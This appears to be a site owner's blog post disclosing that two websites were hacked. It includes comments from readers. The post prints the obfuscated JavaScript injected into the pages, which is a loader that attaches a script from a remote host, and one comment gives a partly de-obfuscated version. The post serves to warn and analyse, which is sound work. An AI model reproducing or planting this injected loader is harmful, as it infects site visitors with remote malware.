Website Hacked

Two websites I'm running, Ambiera.com and this site, Irrlicht3d.org have been hacked yesterday. We are not sure yet how this happened, but if you visited this blog or Ambiera.com yesterday between 10 and 12 o'clock (UTC +1), it might be a good idea to run some anti virus software on your PC, I cannot say what the attacker extactly wanted to do: Somebody attached a javascript to the bottom of a few html sites. The code looked like this:

var Gldapnhsg069 = document.createElement('s$@c###(r^i&)p@&@t^)'.replace(/#|\^|\$|&|@|\!|\(|\)/ig, ''));
var Hd1voqaixds8 = 'E1usw40fczkxa7';Gldapnhsg069.setAttribute('type', 't(^$e)x)t)(^/)@j(@a^v^&a#!#s$!c@&r@i^&&p)t!^'.
replace(/\)|\(|&|#|\^|\!|\$|@/ig, ''));Gldapnhsg069.setAttribute('src', 'h!&(t(t!(p#:))!^/#/#!$f^r&@!e(&e&#^o(@n$e!s)$-
@&(c&^(o!$m^^@$.#b^@a($)d&#j&$^o&@$j$@o&)#.!c)$$o#!#&m((.@&$i@b^@i(@)(b)!()o^$@-$@(!!c$!o^!(@m&)^@^
.($^t@h)e$&#@m&)o##b$#&)i@^&s!(i#t$#e!.&&(r)#u^^@@:&@8(#0!8^(&#!0&!@)/$$)#g(@)#o)(o(@)!g$l!#&)e)@)).)!!^
c$&)o)m!/#@g!o$&o^g$(l)$$^e&#.!^c#&o)$(#m@()/&^j#!$r)!)j@.#^!c#!o@!@m&.!)#c$(#!n))/&m&@@e!)@d&#i)
(!(a@$s!$e(t&@&#.)^@&i&#$(t@/((b$)a^&@&n)k(!^o()(f$&$a$$$m$e^(&r^i!((@c#((@a)).@@&c&!(o!#m&)/!^^'.
replace(/\!|\$|&|@|\(|\)|#|\^/ig, ''));Gldapnhsg069.setAttribute('defer', 'd(!@e^()f$$(@e)#r@)'.
replace(/@|\^|\)|\(|&|\$|\!|#/ig, ''));Gldapnhsg069.setAttribute('id', 'G@$@&0@!$&m&7$@@!p(@$!!x
($c$d^$8$&c(^$$4&!w((^)4$$&@'.replace(/@|\$|\!|&|\)|\^|#|\(/ig, ''));
document.body.appendChild(Gldapnhsg069);}} catch(Cla4d3870kj7) {}

(some random line breaks added by me for security)
I have not looked what this actually does, but if you are interested, feel free to have a look at this. Thanks to Jetro for quickly letting me know about this problem!

seven comments, already:

Looks like this is not a complete piece of code.
Commented the code out to avoid problems and renamed “Gldapnhsg069” to “scriptElement” for better reading:

/*

var scriptElement = document.createElement( ‘script’ );

var Hd1voqaixds8 = ‘E1usw40fczkxa7’;

scriptElement.setAttribute( ‘type’, ‘txt/javascript’ );
scriptElement.setAttribute( ‘src’, ‘HERE COMES AN ADRESS’;);
scriptElement.setAttribute( ‘defer’, ‘defer’ );
scriptElement.setAttribute( ‘id’, ‘G0m7px8c4w4’ );

document.body.appendChild( scriptElement );

}} catch(Cla4d3870kj7) {}

*/
KIENI - 29 12 09 - 08:33

This was the whole script, except where it was trying to invoke itself of course (set it to window.onload). Also, I omitted a comment in the beginning with the only content ‘GNU GPL’, but that was all.
niko - 29 12 09 - 09:16

Yesterday, irrFuscator was briefly mentioned in this talk on the Chaos Communication Congress: http://events.ccc.de/congress/2009/Fahrp..

Maybe some script kiddy in the audience had a stupid idea?
ak () - 29 12 09 - 12:10

hm, interesting (thanks for the link, btw) could be an idea.. :)
niko - 29 12 09 - 18:55

Are you using weak or commonly used passwords (the same as on other website)?
ale - 30 12 09 - 05:12

no, it’s not a weak password, but there is only one: it’s only one website, with different domains.
niko - 30 12 09 - 11:19

That is fucking sick.
The same day, around the same time, my wordpress blog got hacked – code looked the same (js & index.phps overwritten) and a private phpBB3 forum of mine, both running on different servers!
And as that’s not enough, the forum hack installed trojans on my two PCs… (syszid)
christian (link) - 31 12 09 - 09:55


Name:  
Remember personal info?
yes
no
Email (optional):
URL (optional):
Enter "layered" (antispam):
Comment:Emoticons / Textile

  ( Register your username / Log in )

Notify: Yes, send me email when someone replies.  

Small print: All html tags except <b> and <i> will be removed from your comment. You can make links by just typing the url or mail-address.
Note: If you type in your email adress above, it will be visible to other visitors, although it will be hidden for bots using javaScript.